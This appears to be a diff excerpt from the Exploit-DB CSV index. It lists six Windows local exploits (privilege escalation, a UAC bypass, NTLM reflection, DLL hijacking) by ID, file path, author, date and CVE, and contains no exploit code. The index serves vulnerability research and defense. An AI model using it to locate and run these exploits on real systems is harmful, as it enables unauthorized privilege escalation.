 47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
+51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
 14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
 39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,
